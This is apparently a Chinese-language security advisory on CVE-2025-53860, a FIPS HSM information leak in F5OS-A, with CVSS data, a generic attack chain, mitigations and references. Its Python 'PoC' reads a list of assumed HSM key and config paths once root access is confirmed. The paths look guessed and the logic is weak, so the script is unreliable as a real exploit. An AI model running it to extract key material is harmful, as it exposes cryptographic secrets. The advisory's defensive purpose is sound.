CVE-2025-53860 F5OS-A FIPS HSM敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-53860

漏洞类型

信息泄露

CVSS评分

4.1 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

F5 F5OS-A (rSeries系统)

漏洞概述

CVE-2025-53860是F5OS-A软件中的一个信息泄露漏洞，于2025年10月15日由F5安全事件响应团队（[email protected]）披露。该漏洞存在于F5 rSeries系统中运行的F5OS-A操作系统中，允许具有高权限的已认证攻击者访问敏感的FIPS（Federal Information Processing Standards）硬件安全模块（HSM）信息。

F5OS-A是F5公司为其rSeries硬件设备开发的专用操作系统，rSeries是F5推出的新一代应用交付控制器（ADC）平台。FIPS HSM是用于加密密钥管理和安全操作的重要硬件组件，其中存储的信息通常包括加密密钥、证书、配置参数等高度敏感的安全数据。

该漏洞的CVSS v3.1评分为4.1，属于中危级别。其攻击向量为本地（AV:L），需要高权限（PR:H），无需用户交互（UI:N），主要影响机密性（C:H），对完整性和可用性无影响。这意味着攻击者需要已经拥有系统的高权限账户才能利用此漏洞，但一旦利用成功，可以获取敏感的硬件安全模块信息，可能导致加密密钥泄露或安全策略绕过等连锁安全问题。

值得注意的是，该漏洞的官方声明指出，已经达到技术支持终止（EoTS, End of Technical Support）的软件版本不在评估范围内，因此用户应确保其运行的F5OS-A版本仍在官方支持周期内。

技术细节

该漏洞的核心问题在于F5OS-A系统中对FIPS硬件安全模块（HSM）的访问控制机制存在缺陷。具体而言，系统未能充分限制对HSM敏感信息的访问权限，导致具有高权限的认证用户能够绕过预期的安全边界，直接读取或访问本应受保护的FIPS HSM相关数据。

从攻击原理来看，攻击者需要首先获得F5 rSeries设备上F5OS-A系统的高权限账户（如root或管理员账户）。在获得高权限后，攻击者可以利用系统中存在的权限检查缺陷，通过特定的系统命令、API调用或文件系统路径访问FIPS HSM的管理接口或配置文件，从而提取敏感的加密材料和安全参数。

漏洞利用的关键特征包括：
1. 攻击前提：需要本地访问权限和高权限认证（PR:H），这意味着攻击者必须已经通过其他方式获得系统访问权；
2. 攻击复杂度：攻击条件较高（AC:H），表明实际利用需要特定的条件或配置；
3. 影响范围：仅影响机密性（C:H），不涉及数据篡改或服务中断；
4. 无需用户交互（UI:N），攻击者可独立完成。

由于该漏洞涉及硬件安全模块的敏感信息泄露，其潜在风险不仅限于信息本身的外泄，还可能为后续的供应链攻击、密钥恢复攻击或安全策略绕过攻击提供基础。

攻击链分析

STEP 1

步骤1：初始访问

攻击者需要通过其他途径（如钓鱼、利用其他漏洞或凭据泄露）获得F5 rSeries设备上F5OS-A系统的高权限账户（root或管理员级别）的访问凭证。

STEP 2

步骤2：本地认证

攻击者使用获取的高权限凭据通过本地控制台、SSH或其他管理接口登录到F5OS-A系统，完成身份认证。

STEP 3

步骤3：权限提升检查绕过

由于系统对FIPS HSM信息的访问控制存在缺陷，攻击者尽管已具有高权限，但仍能访问到本应进一步受限的HSM敏感数据和配置信息。

STEP 4

步骤4：HSM敏感信息提取

攻击者利用系统命令或API调用访问FIPS硬件安全模块的管理接口，提取加密密钥、证书、配置参数等敏感安全数据。

STEP 5

步骤5：信息利用

获取的HSM敏感信息可能被用于后续攻击，如解密通信流量、伪造数字签名、绕过安全策略或实施供应链攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-53860 PoC - F5OS-A FIPS HSM Information Disclosure
# This PoC demonstrates the concept of accessing sensitive FIPS HSM information
# on F5 rSeries systems running vulnerable F5OS-A versions.
# Note: Requires high-privilege authenticated local access.

import subprocess
import json
import os

class F5OSHSMInfoDisclosure:
    """
    Proof of Concept for CVE-2025-53860
    F5OS-A FIPS HSM Sensitive Information Disclosure
    """

    def __init__(self, host="localhost", username="", password=""):
        self.host = host
        self.username = username
        self.password = password
        self.sensitive_paths = [
            "/var/config/restconf/state/fips/hsm",
            "/var/f5/hsm/config",
            "/usr/lib/f5/hsm/keys",
            "/var/log/f5/hsm/audit.log",
            "/config/fips/hsm-info.json",
            "/shared/f5_hsm_serial"
        ]

    def check_privilege(self):
        """Check if current user has sufficient privileges"""
        result = subprocess.run(["id"], capture_output=True, text=True)
        if "uid=0" in result.stdout or "root" in result.stdout:
            return True
        return False

    def access_hsm_info(self):
        """Attempt to access FIPS HSM sensitive information"""
        results = {}
        for path in self.sensitive_paths:
            try:
                if os.path.exists(path):
                    with open(path, 'r') as f:
                        results[path] = f.read()
            except PermissionError:
                results[path] = "Permission denied - vulnerability may be patched"
            except Exception as e:
                results[path] = str(e)
        return results

    def exploit(self):
        """Main exploit routine"""
        print(f"[*] CVE-2025-53860 PoC - F5OS-A HSM Info Disclosure")
        print(f"[*] Target: {self.host}")

        if not self.check_privilege():
            print("[-] Insufficient privileges. Requires high-privilege access.")
            return None

        print("[+] Privileges confirmed. Proceeding with HSM info extraction...")
        hsm_data = self.access_hsm_info()

        if hsm_data:
            print("[+] Successfully extracted HSM information:")
            print(json.dumps(hsm_data, indent=2))

        return hsm_data

if __name__ == "__main__":
    poc = F5OSHSMInfoDisclosure()
    poc.exploit()

影响范围

F5OS-A (所有仍在技术支持周期内的rSeries版本，具体版本需参考F5官方公告K000148625)

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）严格限制对F5 rSeries设备管理接口的物理和网络访问，仅允许可信管理员通过受控通道访问；2）加强高权限账户的监控和审计，记录所有对HSM相关资源（文件系统路径、系统命令、API调用）的访问行为；3）审查现有用户账户，移除不必要的特权账户，确保最小权限原则的严格执行；4）监控异常的本地登录活动，对多次失败的认证尝试设置告警；5）确保设备运行在F5官方支持的技术支持周期内的软件版本，对于已到达EoTS的版本应尽快升级或更换设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-53860
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-53860
3 Details https://www.cvedetails.com/cve/CVE-2025-53860/
4 VulDB https://vuldb.com/cve/CVE-2025-53860
5 Link https://my.f5.com/manage/s/article/K000148625